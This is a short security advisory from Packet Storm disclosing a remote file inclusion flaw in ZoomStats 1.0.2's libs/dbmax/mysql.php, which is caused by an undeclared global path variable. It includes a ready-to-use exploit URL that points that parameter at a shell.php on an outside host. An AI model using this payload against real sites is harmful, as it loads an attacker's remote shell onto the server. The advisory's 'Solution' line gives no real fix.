ZoomStats suffers from a remote file inclusion vulnerability.
1f5e1660ad95e12efacee2ca91ab18d2<div id="_htmlarea_default_style_" style="font:10pt arial,helvetica,sans-serif">###### ToXiC #########################<br>#<br>#BuG FounD by Drago84<br>#<br>#Application Affect:<span>ZoomStats<br></span>#Source Code:<br>#http://prdownloads.sourceforge.net/zoomstats/ZoomStats-v1.0.2.zip?use_mirror=kent<br>#Problem:<br>#$GLOBALS['lib']['db']['path'] array not declare<br>#Solution : $GLOBALS['lib']['db']['path']<br>#Page Vulnerable : mysql.php<br>#Dir Page: /libs/dbmax/<br># Exempe Of ExPloit is:<br>#http://www.site.com/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://marcusbestlamer.gay/shell.php?<br>#GrEatZ All Member of ToXiC, Str0ke<br># ToXic
Security
<br>######
ToXiC
###Drago84###############</div>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!